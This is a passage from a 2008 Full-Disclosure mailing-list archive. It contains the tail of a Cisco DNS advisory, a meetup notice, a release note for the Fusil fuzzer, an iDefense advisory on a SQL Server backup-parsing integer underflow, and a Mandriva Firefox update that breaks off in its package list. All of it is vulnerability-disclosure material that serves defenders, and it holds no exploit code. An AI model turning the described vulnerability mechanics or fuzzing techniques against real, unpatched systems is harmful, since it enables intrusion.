Vulnerable | | |------------+-------------+-------------| | 12.2YF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YH | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YJ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2YK | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YL | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YM | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YN | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.2(18) | | | migrate to | SXF15; | | 12.2YO | any release | Available | | | in 12.2SY | on | | | | 08-AUG-08 | |------------+-------------+-------------| | 12.2YP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YS | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YT | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YU | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YV | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2YW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2ZC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZD | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZE | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZF | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZG | first fixed | | | | in 12.4T | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZH | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZJ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZL | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.2ZP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZYA | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.3-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3B | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3BC | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3BW | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3TPC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.3VA | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XA | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XC | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XD | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XE | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XF | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XG | first fixed | | | | in 12.4T | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XH | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3XI | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3XJ | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XK | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XQ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XR | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XS | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3XU | Not | | | | Vulnerable | | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3XW | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.3XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3YA | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YD | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3YF | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YG | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YH | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YI | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.3YJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YK | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.3(14) | | | | YM12 are | | | | vulnerable, | 12.3(14) | | 12.3YM | release | YM12 | | | 12.3(14) | | | | YM12 and | | | | later are | | | | not | | | | vulnerable; | | |------------+-------------+-------------| | 12.3YQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YS | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YT | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | | | 12.3YU | first fixed | | | | in 12.4XB | | |------------+-------------+-------------| | 12.3YX | 12.3(14) | 12.3(14) | | | YX12 | YX12 | |------------+-------------+-------------| | 12.3YZ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.4-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | 12.4(18b) | | | | | | | | 12.4(19a) | 12.4(19a) | | 12.4 | | | | | 12.4(19b) | 12.4(19b) | | | | | | | 12.4(21) | | |------------+-------------+-------------| | 12.4JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MD | 12.4(15)MD | 12.4(15)MD | |------------+-------------+-------------| | 12.4MR | 12.4(19)MR | 12.4(19)MR | |------------+-------------+-------------| | 12.4SW | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | 12.4(15)T6 | | | | | 12.4(20)T; | | 12.4T | 12.4(20)T; | Available | | | Available | on | | | on | 11-JUL-08 | | | 11-JUL-08 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XA | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XB | 12.4(2)XB10 | | |------------+-------------+-------------| | 12.4XC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | 12.4(4) | 12.4(20)T; | | | XD11; | Available | | 12.4XD | Available | on | | | on | 11-JUL-08 | | | 31-JUL-08 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XE | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XJ | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XL | 12.4(15)XL2 | 12.4(15)XL2 | |------------+-------------+-------------| | 12.4XM | 12.4(15)XM1 | 12.4(15)XM1 | |------------+-------------+-------------| | 12.4XN | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XQ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XT | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XV | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XW | 12.4(11)XW8 | 12.4(11)XW6 | |------------+-------------+-------------| | 12.4XY | 12.4(15)XY3 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XZ | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | +----------------------------------------+ Cisco Network Registrar +---------------------- +---------------------------------------+ | Affected | | | Release | First Fixed Release | | Train | | |--------------+------------------------| | 6.1.x | Contact TAC | |--------------+------------------------| | | 6.3.1.1 patch; | | 6.3.x | available mid-July | | | 2008 | |--------------+------------------------| | 7.0.x | 7.0.1; available in | | | mid-July 2008 | +---------------------------------------+ Cisco Network Registrar software is available for download at: http://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval Cisco Application and Content Networking System +---------------------------------------------- This issue is fixed in version 5.5.11 of Cisco ACNS software. This release will be available for download from www.cisco.com in late July 2008. Cisco ACNS 5.5 software is available for download at: http://www.cisco.com/pcgi-bin/tablebuild.pl/acns55 Workarounds =========== There are no workarounds. Additional information about identification and mitigation of attacks against DNS is in the Cisco Applied Intelligence white paper "DNS Best Practices, Network Protections, and Attack Identification," available at http://www.cisco.com/web/about/security/intelligence/dns-bcp.html. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac at cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. Although DNS cache poisoning attacks are not new, security researcher Dan Kaminsky of IOActive recently presented a technique that makes DNS cache poisoning attacks more likely to succeed. Cisco would like to thank Dan Kaminsky for notifying vendors about his findings. Note that vulnerability information for Cisco IOS Software is being provided in this advisory outside of the announced publication schedule for Cisco IOS Software described at http://www.cisco.com/go/psirt due to industry-wide disclosure of the vulnerability. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce at cisco.com * first-teams at first.org * bugtraq at securityfocus.com * vulnwatch at vulnwatch.org * cisco at spot.colorado.edu * cisco-nsp at puck.nether.net * full-disclosure at lists.grok.org.uk * comp.dcom.sys.cisco at newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------------------------+ | Revision 1.0 | 2008-July-08 | Initial public release | +-----------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: Jul 08, 2008 Document ID: 107064 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t 2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC =XGZw -----END PGP SIGNATURE----- From synackurg at gmail.com Tue Jul 8 20:28:30 2008 From: synackurg at gmail.com (David Bryan) Date: Tue, 8 Jul 2008 14:28:30 -0500 Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008@6pm Message-ID: Only one month to DEFCON. Just passing on to the security community of Minneapolis, please feel free to join us. Topic: How malware can still subvert Anti-Virus and computer security controls. Speaker: Chris Secrest Time: 6PM-10PM Talk will start at 7PM This is part of our regular monthly meetings. For info and directions, see http://www.dc612.org/ VideoMan For more info on DC612 see: Blog: http://www.dc612.org/ Email: info at dc612.org GoogleGroup: http://groups.google.com/group/dc612 From victor.stinner at haypocalc.com Tue Jul 8 21:31:09 2008 From: victor.stinner at haypocalc.com (Victor Stinner) Date: Tue, 8 Jul 2008 22:31:09 +0200 Subject: [Full-disclosure] Fusil the fuzzer version 0.9 released Message-ID: <200807082231.09305.victor.stinner@haypocalc.com> Fusil is not a fuzzer but a toolbox to build your own fuzzer. Tools target command line program running on Linux, but it works also on UNIX-like and BSD system. There are also some tools to interactif with a X11 (graphical) application. It's easy to add your own tools to extend Fusil. Website: http://fusil.hachoir.org/ Fusil is written in Python, based on a multi-agents system and distributed under GNU GPL license. Tools ===== Actions: * Create a command line, environment variables and a process: create temporary working directory, limit memory and kill the process after the timeout * Mangle a file: invert some bits, replace bytes, inject byte strings (eg. \xFF\xFF), increment a byte, insert or remove bytes, ... AutoMangle guess the best parameters to crash the program but restart with random operations at each session, whereas IncrMangle injects more and more errors (keep operations) * NetworkClient, NetworkServer, (...): tools for network communcation * HttpServer: an simple HTTP server Probes: * Watch a process stdout or any log file (eg. /var/log/syslog): search common patterns like "segfault" or "assert", count number of lines, ... * Watch process death: exit with an exitcode, killed by a signal, or killed because of the timeout? * Watch CPU usage of a process * Get process execution time * AttachProcess: watch a running process (eg. ClamAV daemon) Scenario ======== Fusil is no hardcoded, you describe you own scenario. Something like: * mangle a file * create a process * watch a process * watch process stdout You can start multiple processes, watch multiple processes, chain actions as you want. Another scenario example: * start a web server * generate N mangled images (or any HTML embedded file: video, flash, ...) * start Firefox with the right URL * watch Firefox process * send F5 key to switch to the new session Common features =============== Fusil has features common to all fuzzers: * create a directory to store all generated files (by the fuzzer but also maybe by the target process) * keep the directory on success, otherwise remove all generated files and directories * log all actions into a main log file but all session actions in a dedicated log file (eg. run-0001/project.log and run-0001/session-0001/session.log) * loop until we get N crash (default: N=5): sleep between two sessions until system load is above a limit (default: 50%) to avoid false positive (eg. timeout of the target because of a cronjob) * limit process memory to get malloc(-1) error without using all memory Projects ======== Existing Fusil "projects": * Real world project: - PHP / Python: generate random function call (and also method for Python) - ClamAV: already found cool bugs (eat all CPU and memory of the daemon) - gstreamer / mplayer: have fun ;-) - identify: ImageMagick identify or convert commands - firefox: test firefx image parser, flash plugin, etc. - poppler: PDF library of Kpdf and Gnome - libexif: JPEG EXIF * Old projects (simple examples) - gettext: demo to prove that gettext is unsafe - libc_printf: printf() of your C library (yes, it crashs) - xterm: doesn't like long PATH environment variable - vim: old version of vim crashs with Other projects are available but don't work: linux_syscall, libc_env, mysql, linux_proc, linux_ioctl, rpm, ... Incomplete list of crashed programs, CVE, and bug reports: http://fusil.hachoir.org/trac/wiki/CrashList I just tested CPython: i quickly found 14 bugs ;-) -- Victor Stinner aka haypo From infolookup at gmail.com Tue Jul 8 21:38:10 2008 From: infolookup at gmail.com (infolookup at gmail.com) Date: Tue, 8 Jul 2008 20:38:10 +0000 Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008@6pm Message-ID: <289762736-1215549486-cardhu_decombobulator_blackberry.rim.net-622753870-@bxe028.bisx.prod.on.blackberry> Any meetings is this Nature in New York :) ------Original Message------ From: David Bryan Sender: To: full-disclosure at lists.grok.org.uk To: bugtraq at securityfocus.com Sent: Jul 8, 2008 3:28 PM Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008 at 6pm Only one month to DEFCON. Just passing on to the security community of Minneapolis, please feel free to join us. Topic: How malware can still subvert Anti-Virus and computer security controls. Speaker: Chris Secrest Time: 6PM-10PM Talk will start at 7PM This is part of our regular monthly meetings. For info and directions, see http://www.dc612.org/ VideoMan For more info on DC612 see: Blog: http://www.dc612.org/ Email: info at dc612.org GoogleGroup: http://groups.google.com/group/dc612 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my Verizon Wireless BlackBerry From labs-no-reply at idefense.com Tue Jul 8 22:18:29 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Tue, 08 Jul 2008 17:18:29 -0400 Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability Message-ID: <4873D9A5.5070508@idefense.com> iDefense Security Advisory 07.08.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 08, 2008 I. BACKGROUND SQL Server is Microsoft's database server product. It supports the restoration and inspection of backups via SQL statements. For more information see the vendor's website found at the following URL. http://www.microsoft.com/sql/default.mspx II. DESCRIPTION Remote exploitation of an integer underflow vulnerability within Microsoft Corp.'s SQL Server could allow a remote attacker to execute arbitrary code with the privileges of the SQL Server. The vulnerability exists within the code responsible for parsing a stored backup file. A 32-bit integer value, representing the size of a record, is taken from the file and used to calculate the number of bytes to read into a heap buffer. This calculation can underflow, which leads to insufficient memory being allocated. The buffer is subsequently overfilled leading to an exploitable condition. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the SQL Server. SQL Server 2005 runs under the "NETWORK SERVICE" account, which is similar to an unprivileged user account. The target function can be run by any user with access to query the database. This attack could also be conducted anonymously through a Web application if it contained an SQL Injection vulnerability. For the server to load the corrupted backup file, an attacker would have to supply a path to a remote file using either SMB or WebDAV. IV. DETECTION iDefense confirmed the existence of this vulnerability in Microsoft SQL Server 2005 Service Pack 2 Hot Fix 4. Additional tests against SQL Server 2005 without any updates suggest it is also vulnerable. Previous versions are also suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any direct workaround for this issue. Administrators can disable SMB and WebDAV support on affected SQL Servers to prevent access to remote files. VI. VENDOR RESPONSE Microsoft has officially addressed this vulnerability with Security Bulletin MS08-040. For more information, consult their bulletin at the following URL. http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0107 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/06/2007 Initial vendor notification 12/06/2007 Initial vendor response 07/08/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Brett Moore, from Insomnia Security, brett.moore at insomniasec.com www.insomniasec.com Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From security at mandriva.com Tue Jul 8 22:30:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 08 Jul 2008 15:30:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:136 ] - Updated Firefox packages fix vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:136 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-firefox Date : July 8, 2008 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.15 (CVE-2008-2798, CVE-2008-2799, CVE-2008-2800, CVE-2008-2801, CVE-2008-2802, CVE-2008-2803, CVE-2008-2805, CVE-2008-2807, CVE-2008-2808, CVE-2008-2809, CVE-2008-2811). This update provides the latest Firefox to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2799 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2801 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2802 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2805 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2808 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2809 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2811 http://www.mozilla.org/security/announce/2008/mfsa2008-21.html http://www.mozilla.org/security/announce/2008/mfsa2008-22.html http://www.mozilla.org/security/announce/2008/mfsa2008-23.html http://www.mozilla.org/security/announce/2008/mfsa2008-24.html http://www.mozilla.org/security/announce/2008/mfsa2008-25.html http://www.mozilla.org/security/announce/2008/mfsa2008-27.html http://www.mozilla.org/security/announce/2008/mfsa2008-29.html http://www.mozilla.org/security/announce/2008/mfsa2008-30.html http://www.mozilla.org/security/announce/2008/mfsa2008-31.html http://www.mozilla.org/security/announce/2008/mfsa2008-33.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 134656784fec1e552df003e63a5e09ed 2008.0/i586/devhelp-0.16-1.6mdv2008.0.i586.rpm be1ba96b9b691b3fd80ed3187d7f209b 2008.0/i586/devhelp-plugins-0.16-1.6mdv2008.0.i586.rpm 2298329ddee124e383b9ed41ba05885b 2008.0/i586/eclipse-cvs-client-3.3.0-0.20.8.6mdv2008.0.i586.rpm 82a50803ec07cb0e90d48ee64e367129 2008.0/i586/eclipse-ecj-3.3.0-0.20.8.6mdv2008.0.i586.rpm 9768ecb8baa59a63f67db0d14607110b 2008.0/i586/eclipse-jdt-3.3.0-0.20.8.6mdv2008.0.i586.rpm 5f19f730f6a7c58ea55b4e236e01ba1f 2008.0/i586/eclipse-pde-3.3.0-0.20.8.6mdv2008.0.i586.rpm 919a0d55a9722984caf00b823d1e38ea 2008.0/i586/eclipse-pde-runtime-3.3.0-0.20.8.6mdv2008.0.i586.rpm 6a9a33b5402114398e3db5051a5d0014 2008.0/i586/eclipse-platform-3.3.0-0.20.8.6mdv2008.0.i586.rpm c5d1fb9877a3880ffcf1064ae8132346 2008.0/i586/eclipse-rcp-3.3.0-0.20.8.6mdv2008.0.i586.rpm 2889c6acfbac4df49a389461f01269c5 2008.0/i586/epiphany-2.20.0-1.6mdv2008.0.i586.rpm 3377f86732de234c4cdbe28deb70e05a 2008.0/i586/epiphany-devel-2.20.0-1.6mdv2008.0.i586.rpm 1841e93d2a617412133ed284ae0d1926 2008.0/i586/galeon-2.0.3-7.6mdv2008.0.i586.rpm 580e1cac5b0261ae1f62b5a374c6365c 2008.0/i586/gnome-python-extras-2.19.1-4.6mdv2008.0.i586.rpm 9a0e65f01d3294e78c21873e7bb01859 2008.0/i586/gnome-python-gda-2.19.1-4.6mdv2008.0.i586.rpm e1bbeb6496610e46989dccc987055921 2008.0/i586/gnome-python-gda-devel-2.19.1-4.6mdv2008.0.i586.rpm 190345e16d16b6a5fb9b6fcfe3ccff76 2008.0/i586/gnome-python-gdl-2.19.1-4.6mdv2008.0.i586.rpm a809c07ff75c2bc40d0c7cc1797b9cfe 2008.0/i586/gnome-python-gksu-2.19.1-4.6mdv2008.0.i586.rpm 8ac32d325c561616054690d5bb9de9fa 2008.0/i586/gnome-python-gtkhtml2-2.19.1-4.6mdv2008.0.i586.rpm 07c5ca4505610fd6935744f2d4d4d30b 